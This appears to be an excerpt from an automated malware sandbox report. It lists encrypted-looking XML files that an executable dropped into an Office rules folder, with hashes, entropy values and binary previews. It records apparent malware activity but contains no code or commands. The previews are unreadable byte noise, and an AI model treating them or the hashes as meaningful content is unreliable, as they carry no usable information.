                                                                                                                                      SHA1:43743CCA6411E459D6DA03F2E553FF98946590C9
                                                                                                                                      SHA-256:889878E5EB5069B6C949D4CF79D780731ADB6BD7FD0547A25BA7191A5E266844
                                                                                                                                      SHA-512:FEEC56FA49378ECE21826D9C30E04A98DD3522DBD20AD59D2C7067B775FB04B41EEC74F3DFED65D52C434CE342699A6EBDFF1C723C096192A46DC5BF3DF768C6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlyy...zj.i..Xxz...O.\..i.:......Qe....*MO~..7..6...H..|<..U..4.cm7).Y....n,$.x..~p....D...q.X.>.!7.!..*...r.O.r\n...^..R.)~....P<.Z.......F.48....3"..Vm4.6..J.W../......Qv8s3......E.H-..`.&x-X.Bb......0.1..5.MH{?..$..W.......>+..ydB.-....}|..y...l...^..-Q.PxRk|..i...).%.D1R.N...-..:.v.D..WB....$G,. ...u.R,...v.#A.0....&.....U.....Ed...7bN.Z..M.d.....M..?.&>.CF..8..lh.zW.*10..dq....P...M..&.bL:qP.-.x..}Q.t......C..G@H.1B......x.|AL....-...0.....|..4...5b..*SD...m.....fSI...3..H....w...B+{;b-@.V8cf(y.w.^....r..<...K......~....=0<{..Q.A.".E..)..s:...va(..8..m...>..8...!.t..T...B..n.K...Z.q....mD.F....&...~..Y.+x....v....E.q...}......q..9.WK..Az.`.{.:`..{.."d].Ws@Kc../W7tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170054v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):961
                                                                                                                                      Entropy (8bit):7.784258847946433
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:wxI0B6BHQPbhitc06HAtqjSlxCtoMt4GeLrq1bD:AMBHQg2NCkV0rwD
                                                                                                                                      MD5:53DF8172AD27FC66613E380887F52C20
                                                                                                                                      SHA1:468F0C8F78C059596DDBBADAD7BF24FCF85FD9EE
                                                                                                                                      SHA-256:2DAAAAFB79A0C500B925AEB20C0EFB3D2FF046865BE57FBA2CBD9D1C9A7A5905
                                                                                                                                      SHA-512:19F698A24A2CA4B2762B73CAD2179A430F5249DD85ECBE8B49BCBCFE429BFE7102BBD6AF53BE3C99F80B73F725A54D8B3DE39B6F5C730796F7440F3BEA783967
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......|_......%.o..V.$S...a_...j N..V.1K.)J..1..1<fQ..d..".j !...#r..z...}.&..x..g.&..H3..]..E.l...&..........+.V+.{f..XQ..:.?......V.@.\.tH...8;.1..?.E.83S..\.vl.J. .TRW.*9..5..ny$\..q.<..0....t....YP....P.|...A)....:.3..!.%........./1DTh.0......5...C.......8..s..aZ.......E).t. u.].....1?6..t.T...&.)c.Y..6.wG.f.S+..b.....gyf.....i....RP...|...=9._>".$2&...RBlT(...!..1"zq_..:`..a...M.%.Q.(V.wt5hR....3_.i+.X...hrH.Nf..K)b..v..&-.....}.Q.x..D.....QBo..R.^.4H...5r..'.?8=.L...~.!...K..c........f..'iH...xy8/.s......s../..5....Z.4L...P).v0.$...<..<..#..Mt.`.Jn...*........$QP..xS..[.Z..5......Q.-V...5.|.E..~..l._........>.P.......).y.)..G.....}J|..f.:.~.[w........X.......5.4......g............3.......7J..JI..+^.....n.Wp....$}.g...AwTZ...>.V..3..<..Dw9.f..].......b@0.....w..K+u..T1..2.t.....b.;.Ml.e'f...,..8..*6......K.K=.PMBsSX.@Y.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170055v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1131
                                                                                                                                      Entropy (8bit):7.800608362087712
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:xCWkHAVmAKCUobLPVra6c4VgKP7oq1ljAvb4r3C3ZbD:xoH2KCTfPVra/4VgK8qvjA8zgZD
                                                                                                                                      MD5:9AEB72D1D1E2F6D857AA1A40C91BF9C9
                                                                                                                                      SHA1:FC078498CB4B67609F8E1878ACB00668B1289F4C
                                                                                                                                      SHA-256:8DB23EA6D8ABD2DA1DA0A35CC9872485B564285462A166691F675E05B2C54A55
                                                                                                                                      SHA-512:64908B57004B3ED58BB573FEF0DA36B79504099C205D958B4AAFE4F37EF63C6EE404B151304D40335A7EB18B82D3E4994AA13100C52F8200BB39E20BF944A4B6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlb...QvC..jt+........7.&"a.....:#.^ZK.QS..?c}.js.t.B..8..,zt.&.<.:......p...a.g....qE#.i..L..uxT(h..bEX..q7N.!.P....}g.Q...G....<..*...!...=L.r:4%...2.&*...<..'jF.|....2`....[...T.......R.(ll.R.....+..g+Cm.e'..v...b.._..}...J2.@.~.j..i.V(.....q.H.o...z.p.....=3...S...I.?%.......{......RaL.......+.......7..|.o\...i*\..aHr]_. '4..Q.$.~Ny....BuU}82.350...c.Sk&..J&....zS.../.k..y..D.={=.84..R^........4......w..T........k}fR.,LxN...5C..T0.=,..%...*u..0...B..BAr. ..&qP...3. ..La.d.VW8....L...6K.o....a.x........i..(..@...sD#-5.^Q\s..........#$Mj.`V..,...'.........X1.O8kj....!.y...../.Y.wA......R.\T.Q.dO.5.....5....4......Y..^..)`Y.0i..<n.*S.].`>...%.'..O...~..a]..b1.A\6~...S....Y.Q.u.u.y.}......8.EMo.o.D..R......`\6..F.....0v..n....@p.^...!..$.T.....1.Ko.z.9K.)=....OZ.1..Y.N..RV,.G....w.]. ...&..7...2.T..Fg..M.a..K....0.p4.\N706..'....H...M..8..%.DQ.......w..L_.K...Ii...P.[D.,.;....s.~x/.6.eQ.._5....0.J...w......Hq.X.H.....?j.J..R..'.K...Z%.;n.vsm..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170056v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):987
                                                                                                                                      Entropy (8bit):7.7529476495287355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IDloHKG2aHAznP4Lx8dMqZ3PAZA9P70EKGPGaAH/HIDxlDobD:G8KIAjPo8dVZ3IZA9gyk/OT+D
                                                                                                                                      MD5:FF9AA5E53B3200E07BE462C451BA0118
                                                                                                                                      SHA1:1E01EA72B097F260965C5DCDEF79FB3E13E20891
                                                                                                                                      SHA-256:828E94279A97B3CDF233F36F858E3F098E69652BA065CB976774912E7DC0D330
                                                                                                                                      SHA-512:E42EB154B5E5B11B607F87B49949140E05D37E67A65171A6BAD3B764D28A0408DB7DF75770268B9B769ACF32DD212FB88F188DE2BA6436E664A606EB2895908C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml5f...W.agub../..FB...0.P.P?5c.I.w...c.j...-EdX...%...O..r.3........SW....3.....9.d....P...Y........Zs...5..@.O..N..I...$U(.7.1AP.'..?.?.....5..t{iJ.<j. j..j.~.9.y.2q.!}2k6...C.z..y..R....v...!-..a=L..F(.Z....F.z..(.....R....9.1....R...#U4.$..._D.W.,.m.D..{...?..........b.....qIAD5..v5..YN..w(..Y.4........._.?...;f......p.".T....X...i.vS.X.4l.....Z.:.J.I....)...!.....|.........1Q...x.$+#..Qh.y*..!..f5VuOi/]..O...zJ.j...........w...qoA..2\.;.Ha.s...]....7...D.Mh.......yx..C.m....*C.3_8..g;Q...a..Wl..e..m..7P~..K.........c.We].Y<i...Hb.......|.x.~i..U; 4....k@1....CE..._.....i....ue$V.....hNO.H...B;.?..iwt...../bB.S.t^..3...u./#..1.hT2.SA.j...fA..e`..7H.2h.@~Jy..7@..........%..E.KU.ox}.....H..).......R_.E6.ID...}.,&......C.......j..6..h.ks....~.@.b.nd...."..Eat.".;.k!w..m.J....hs.[.N9S.d......Q...,..tul.kqB){L$..\._.......XD}../8........./..~..s.5.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170058v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):857
                                                                                                                                      Entropy (8bit):7.72327126304022
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:17mDPJXR61IzTp7V/1V2t76m/vX9VpkbD:17m1XR6Up7VD2t7vMD
                                                                                                                                      MD5:6D5BFBC96ACB2899AE61E933EDE41F1F
                                                                                                                                      SHA1:2A85DA706B0C05502805453FE4057C54167BBCA5
                                                                                                                                      SHA-256:487D08ABC1CAB14F833EBA8F16A131784CB942C7047EF84B83E67FE4E350DE46
                                                                                                                                      SHA-512:DCD8FB0CE3C4D1A056BF131F97BCE7120905122C610F8DC17E6F71700907E95AA9C04B2FF8225AA977BA03E2E57012DE8FC0C4515AE41CB3D141B61C53322455
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...]..<C..nT.......Vr.@.Q^...w../[.3...w|.....c$)/..6f.W}...'A.....@t....5bzw.....+>.J.......${......L...j..h..%.....,.~.)....Q2..;..g8:.....g....].5j.. ...7........@`.w...BN2D..~._.#.L..[.?.G.h.3 .V..l..8..-........./Ab.UG...... v................c......m.X...J..\(~.&1i..Zl....A.0?.....W....E%......@B.yV.~'..r..A.........c./J.{..'....$. .`M..;...L..Ag....{HR.8z'.b...`.C.>0@00<..S+...+.P[$........!.24.-.AV.7....z@..........O.../Or6.wn.R.Jl... ...g..V.4.B..,....F.....)..;.)..M.......\.......A.;<...8.LF...W......ix.G.s"...3Y_c....&5t...Xz....\..?.$..B.C...+.O.R@.J....P...}>..._K..m..N5.N.>..B.d....NoHI...C..G.E'W.0....\ez0..w.s..?8K.!O...F._Q..b..X..7....5>....&...n.E..#.!.....A.^.%/.{].+stg..N4..{.#..H.<..M.r.. ..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170059v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):859
                                                                                                                                      Entropy (8bit):7.722793712550558
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uhT8Hou7DpXfqN19IfA5+IxxoNZkEfvzpndbD:hNPqN19cG+IDoNxfpdD
                                                                                                                                      MD5:7BA316706051FDFD956C09CC6FC1D384
                                                                                                                                      SHA1:0B99F9B2A1C8EA3CA00710EF83AF34BBB55CACD8
                                                                                                                                      SHA-256:505221B779CDE5DA7711837443D2DD2C41120E46B484779B93BDE8643F9DFE20
                                                                                                                                      SHA-512:53EDBE92B10E378E3BDC44BC0E3A34556817E72BA619AC7A2D57F6605C422EDBB3B44E9E4833D3E33F547A69D61C4C78DF6026C7A3F71E8D1BDBAA55256D7372
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.."]d..`.lv.Iz.d....S...wxO....FZI..)..u.....F..Qg...@.@.oy[P....IQ.fP}|....W....~.%..P..q.....@.n...B\....D%....].E....s1-%....vZ........'=.P..1=...F.i.K.../?.awT..........J}..a$O7.~U..u%.X.......+O.......z.=o.s=S'.y\.......M.Ya..(1.m...%Tp.ng-..|c(p.|$T...t.4a.....o<....Av...I....a?....$..y..%C...5./.P`9Klrn.G.IG..S..z1.v.Ab5...o~.i..w..K.>{11.h,.O.F...DR`.<(.7..\.........._9K.B......&.u}f../...v.{...~.. .....5.4*c?.n.d;u...7.h...b..V"..L(.4.*.PM..?..cP.....T1/.H.x..5...V.GBA..E.c..."W.fu......&xa..?.] ..X.F.=.x4......'.H.F..(B>B.RqJbhV..6N.k.%x,Q...8..t)$....XP......BqxAe..(.qa..`.......,w.SJ.I....1...K....;....6:/....T..`.rD......L....dr...vc..i.^.X?...^.=.y.`CL)..Xb.."..O.v.J..}I..1.Q[. g....s.e....c.p.F.e[.hB..I;tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170060v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):725
                                                                                                                                      Entropy (8bit):7.678959756986618
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:QxvN3At++o03U9B9jzZFyQ8lJ0DtFwoe+uW9g4ozU44gGVA0WpMfukIcii9a:Q1N3Gt3uBpFFtS0i+uBfUA0WukbD
                                                                                                                                      MD5:F54CAA1A4BB5BD82E381D20A6F4A9ED7
                                                                                                                                      SHA1:768A2AEB4556566B385E134B15F156776DE0D4D2
                                                                                                                                      SHA-256:1C89AB8D235C56DC447943D0579F0A98799D36B8EE7C417915759B0D6E1F195C
                                                                                                                                      SHA-512:4F9E778788276241C3D6904171808F3B86EAB3633AAC2F6EDC32502069A5BE72C3932C262C6631054C0722369F563AC3D19377A209770F5B99DCA71AE3CF1ADB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..j..2~gARhwLQ#Y..Z.-...5.050\..]...*mX..%.hp.......z.'.....9.%.......B.b......j.*"..?....._"...n.".Or.3S...t".).A...........T.p.......>.#.O.v;>..d...*...#._'..... ......6.NY.).)QL..t..|?5d".{gg.....g..,..Pe.G..~c\.....ez.2040..DR..uRW..b.&VicM....1.....6.;...8S..Y.D.|..*+...'....)F.-A....!..._@.9.d|I...67.:$.</.<.V.W&m\....wY.n..5>_....v......c)9"9.!.J.$...wI.SQ.R.m...VA....J......8..>....C.B..jC...A....a.%\`[yx,......no?V.V..w..[.......9.{*.O.Y_...F.-X........t.......?P..^..h-..|..@..4w........Yw..8l..P.<./......yni(.j^....a........]..1..Hi._..G..E...^......u4........s.h.....?.....j...=..c...k.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170061v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1175
                                                                                                                                      Entropy (8bit):7.808197131689179
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:UGoPNtmuIhZy7FkyOZz6ZNUcqFpjXWZ4z9WL7xOFr6pjPGJBOuNHMTU7bD:poltKyTAGwoL9w6VPGJB7Mg/D
                                                                                                                                      MD5:173B7BC70B935A119E20EF045988A1B0
                                                                                                                                      SHA1:A25D859932B04A01AB009652AFDCF78A0B3976EF
                                                                                                                                      SHA-256:7C48B3D81581B8512095F3603C45F3FD161F559896A279CACE221DE71EF3F88D
                                                                                                                                      SHA-512:78990A9E74C8D710C96564F829B2F46E60BF12A8DD505C0110281615514358907E3C1C0EB84856CF9C657FA8D331F0160E8DCAE8604BDE6114C480E1DE1B777D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.5.G..+F+..2@.-ax......N.....-..c.Gm.x!.|7.Y.L..?...18...4....8.~P...:9.g.....JN.6\.Y.xa.+F....DT.U....C.+....6.....C...V..3P5>5c;.b.%......F......./{.}.or..6[.....0M...S.[...8)hH..n.b:.loa..k.Y#>.'=..."..>./.\......{...W.2.E<.9..-..h1..7..}...2..)....g~'|.X...'g[Bx./....s.=..B.&=z.b...'g....R..W.,.s.........Aq$..D..+....r(1...x.....{..y4hd.6.=..Rj.0UUj.o J.`m.L..Q.P;..)a.....t.w..x.r.R..O@.......^...y.,..<...)z]xZO.A.?...9_.JKx...o..S.X.f..TU ..<...Z...Sj..6......U....4[.6\.>....!z..II.8p.W......R.....m... .\.]..j.vJ#.....i%2..XNt....8'......ZL..0..9.xs....d.....X_........m....~r..S.....q.P&e...c.<.....1.5....2|..V.r.Q.-.E&N.sg..dn...e...."...&....~lC..G..|X.uH66y3h...V...V..Q....4..x..w...T+.N......M....l..:VZ........Z9..>u.}....H...)u.Y....mo...85m..g..0}.sh1.7..7eV..kF.......y\.Dw..n.L.k.OCh.R...kY|.............>.."M.wzo..,Q.=I6..1....hn5......h.........?K^..^....z.9..........c8..l.|....Gm2.nw`VoY.Y.K."..Zm.:Kk#H.i\f../k[.p?..._...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170065v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):724
                                                                                                                                      Entropy (8bit):7.722748402985843
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:dtbIG766CLsqxLs8XH+QH8jxvfY5FnO8EIQj5WZVq7PmQ0PukIcii9a:fP6nsqxLNX+QH8FYDO8EIQt7CUbD
                                                                                                                                      MD5:D1C8410C03ACDF46E644AA9BE15CAC79
                                                                                                                                      SHA1:314F33FD9465A9C177D3844C1D617EFA3B29E996
                                                                                                                                      SHA-256:3B94145E2108334EA4EDCF13B358AA36FCA573FB8446782E941F84A067132D9B
                                                                                                                                      SHA-512:85A2F69E31FB2E18AF03D4F2796FF616E9E3B27E8C3D5755B624EFC24DE227F51AB0625CF965AF8FCC31A19D55BEF20C2DE736838959B24485ED8242C22CD37B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.}`2T...f6*b.Q.<....r.~.Y...u..@.."U..y.&}....\i....tG...N.R.~cJa..='S......H.....9x+.....D .n...a..v3.o...4.f...kb..Qx.s2......E.Y.V'....'2f.4....z6.pZ....N.....f..J..(....?.c.PM.tJ.......MB.'ADU..A.B`..L/&cq....~..t!-.QgW.].F.pFS.+'.0+F9..$_)r.S...I..{.Cv...h!.@...2P.3.!.LUO.x.J.R..B.I#2....6....mO.c..En...=.K.Vb.'......p.`;6..MB3%=...."...~.I.h...@.....]O.>....s...W+...2.n..../..Ek{.f...'.4B.5.L.N...YeP..........M{%h.9...w.P!.M.<7.WLu.v..Z.?.r...[-....Z..+.hG.`...=..(O".,j.V.YZ..N~......r..m..d/..C...`1..../d2....u..)..-...}.....^t....B.[.D...4..;.C.....Q|..6.....L.....'.S.T.4..../.........a..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170068v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):746
                                                                                                                                      Entropy (8bit):7.689253381642167
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:iMYUTuF+dEpTQ1Cb+ypmmfcwzSJIz+YHVPMvcfBM1jeJ115UJIdIElyKEuukIciD:LYUTu0dobHcocwzCcZMt2115UkCbD
                                                                                                                                      MD5:0E7103FD4307DBFEAC1E9FDB077FC51F
                                                                                                                                      SHA1:1CA23573A042CD63B241F85CD49748FA11B03BF6
                                                                                                                                      SHA-256:752E0D3FB10681A526903C9B0C470570B98805CCF28FC1D052C15DB186E07E66
                                                                                                                                      SHA-512:5F93CF198A92ABA716BBA3C1D58CC54B3F10116679F5BC62EB8EBCE8D64248D9AD689B52AF65BBCF3BF91B0FC6B6CA680940ECC359874A0B6932F458A7802081
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Z....%Y.r.i.A..`.O...u*.c..d. ...r..1......D..d1...h.eP..-.28...(..Y..N.8.......zvh:k$pj.......5.#.IQ...N.:...I|M}..\..Y.......5...T..T.(.Ci...7.tU..".3.7..vn....BI#.L..w0..D.d.z.J.h.?.A.2..2lI+.%.XJ/......q..t..?..."..KX`](..S...2...|..A.'..%..^.d.>.........>.{v.pl.,.?e8A.....t..M...%>&......^.\.oC.$..`4.^.=....cor...I.G.....s.G..j..6 ..Yt..)Z+...H...lHS."WJ..R..Kv*......+..h..2..+.3;....u.....[..+.^w!.a.......&6d...&..ih.TF..B.a.G...o..G....]...Y<.?.w.6..U....T..7^|&......wF..l.24].pq...Cl..whkIQk(D\...|....)@.c..v..r......a..|..B\...U....^U.5......_n.[.} ,..83.I.;.).....o.f\..r.0.Pq....Hzk.'...;N*.;..:.....f.Z..X8.q:..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170069v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):857
                                                                                                                                      Entropy (8bit):7.738529238078469
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:wTEDDzgtsPDZ9F9qCbS/jQNAQog6hXb1oJtGMbD:wTEDfbZ9FpNPog41oLD
                                                                                                                                      MD5:6EDE224E0B6E2B67CB74FD04D8F38EB3
                                                                                                                                      SHA1:0E744A69A6D4875A5D04A1CE6B97E76C2F498512
                                                                                                                                      SHA-256:981F7819572091A78453C3ED8F9A86FA1A005D162FB66835D494B3E00D9A2A77
                                                                                                                                      SHA-512:AE98E2418997A92AF82D4C1B670B897C7FE2E4B833A8E0982636CE7C434D5B12381D707BCEEAE7F7FD76306693BAF79197B325A5C4DE8BBB8703F9E0357567E8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.6...e.4+}G....34`7...a.|.........3..RR .t.N...sd.\. .w.X..7...G....(.V.3CC..c..R.>y.N..P\\....pZ.....Pj......../...I.B..........U.i....N...:..>...#.....\wKKn.|| ...yDf...a?.h+[.WH.f..y..|..U.T..`....s..7....*.P.4C.JDsoO..W...=.).....(M...x.wu_!.....#Q.!.&.........I.Wd......t.D..[[...hV.;q./R..%.a..g....[.)...y.Fh;A... .wYX"......<...".}...$....fnI..D.r..k.+.U./.:.6k..M*D....q.'...&'..EH .T.... M..........}.z.a..>|..;G.7..n..$.\~c.....md..&.>>....oPx..#.....<.....7........5.d...L.(.Z.E&.a..r......V....3..=sB/.Z..o......{.9 .......K..........#m..le..s.q.TA3..\&H....i;.$0k..1......;...UeV..@wc....{{Xh=.....}R.(....@Y/..r....#...o.4....s..?..x...;..2vj*.....%Y..}.c..F=..M..?C....T..B<`. I....-.m.R.....2.[Gn5._..r3]..B....}....S.<.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170070v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):886
                                                                                                                                      Entropy (8bit):7.819494310444011
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Ouai83WFWRQoQ5O5Fz2HMM+5Nvo6T+ks5yRvbD:s4WXwOXS2vzJRzD
                                                                                                                                      MD5:EB15E6E526FF468546EE70FE4915AFE5
                                                                                                                                      SHA1:040111F2819977397CFEB623E8DFBD2E21785EE7
                                                                                                                                      SHA-256:D91217C6372F2BDB7428AF302C4497978C47982C925672BB3E7397358EDF6E5E
                                                                                                                                      SHA-512:04856929E169B202B7C4600391CB11CF4F1E5A92E6A8BF5521AFF733C70F084A5E9B456835218F3EC2F344FA682DAFE9665DC6182544B755B885C7CEE8EDC95A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.)e.r..#....TO.._....Z.X.. .^T......~.H..-r.u..W.1a.....>.....B.E.C!..'.2&..{B.M.)...g.......D..M.....r*|..k......r.*H.#c..h.A....,h.u:....2..].n-..l....O.......tah.;.."..JvZ+<.j.Q.^..k.l..?..WL.....`...<...?2....{4....X.%..q.n.DI......-..V3."......r..~..,..z..a..*'.\./.>KF.7...5.6..#.T3.bwU.he...>[..:O.p.&.C..8..u!I~.t.9....5..[...K...K..v...5...nsST....0.7.L...l...E ....01.._>`.O.[./n=Uq......G."m........0.BJ..L.D....g...P\.,P}@...PL.y.!.z.....f...r......m.....I........@.]..'V.....9...........y......%.r....b...^J..3..#.......>G..=..t.S..._....}./.(.f$....d._...w..O]...l.$.WL..*.".\.v4." *j.'..h....t7..mX.........?.f.!...W.S.~..<....6...+....d...pG.....Y1.k....Q.%.+29..}..R^......u..V.UG...q....Q.U...C...n.o.y..m.....VG...[.t+.z.j..Y.Y....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170071v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1003
                                                                                                                                      Entropy (8bit):7.784576429963994
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:umcDpSeohmv2WOi925aLmbpjDMHnItBurtbCHMDte7iLG3gQbD:Mo/WO5D5MH6eGHMBe7iC3rD
                                                                                                                                      MD5:2AC051049D50E6EC089A4F2D9B8CFA1B
                                                                                                                                      SHA1:CF05D949BBD16E6F20F134F8FF1314021D5A9053
                                                                                                                                      SHA-256:7879E7814FB9E704A1BD00AF47C19E36DB4214272F5FFF793C34994A64DCE682
                                                                                                                                      SHA-512:6E2406E2341EF32E09E5984A411E3E04814C8832037FE4F814F39DBC4D2DC3E73A517B49B5A7DBCBA0D1B26FCC63883555B7C4F1B7E15A20DB389407353A6B1B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlt0....Z..:....w;...9..L!..P.D...;......f[......~....{...!.6....ha..pMT.......T9.+......L.P...w.st.?0...8..|...p..!B......L..<tB)9....NWG.%.V....<C...G{h,Q$... ...T.......:..mH.......@.Ni..cn...oV.....6DA..k...s.T..07]U...,_..dV.=.c.7...s.a....q..9z8...];.U.-................>.h....9...n .mj......`.....:..%v.M..a...._M0n>.u....6...0.4.xx3..O..D._...B..8(.......~._wnQ....Q..+.=i.+...F..L..$.bG.R......w.".O..'z...KJ.&V.*..r...}K_..G...9.).2.f"...qG....op.+.....&._...a........c..ko)).[..T.~...T..A;8.s\.g9V..WIf.p.....W..(.8....c0...Wv.}j.;B(v..Z...Xo.~...J..r..q.F.Y.....1..TxI..E.k..l..a*.S.....nj...d..BF..O*..$5.TS......u..A.i.*.YoS...m...s.4..H...2Mg.t.K.V#{....nG.A\...<..}X.bV.v@..+...HR..<0wu.....q.Z.}~nW.3.Y..1.0...wq..j.@b...x.wb..G8PqMV._..E..J.i..C.!a..E....Ck;..E.0r.......~Mw..O.4.:.\ .x.CCte..u.../....y.`x......C3*..y...........5.>..-hu.k}U.m...(%........}..+tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4D

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170072v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):726
                                                                                                                                      Entropy (8bit):7.6835070514748125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:+4bIaccdzOZJqBWSFAP5r6CarKRlNT9ZqlJVDWr1bRtsuCA161nYZukIcii9a:vcacRJwFAHakjBZkJVDWrp7susXbD
                                                                                                                                      MD5:62E0B6B43D5C9CB2B251EE23AC2C5261
                                                                                                                                      SHA1:8A27F2BEDA8AD88CB4DC99A622B60E1ED1D8A133
                                                                                                                                      SHA-256:3A8E652DDED68BF355B153980C0FB0F68FD724F69C392335EC4FFCD8FC8BFE55
                                                                                                                                      SHA-512:F20A45EA4BC916D2395A265A25DF6FAE1403A2513CF9E5D1C0A18E81C547CBD8A3D0F154FA9A08984FE5CC3F4E1FE9DD813DBF16C240391B5A9CB96807C32A58
                                                                                                                                      Malicious:false
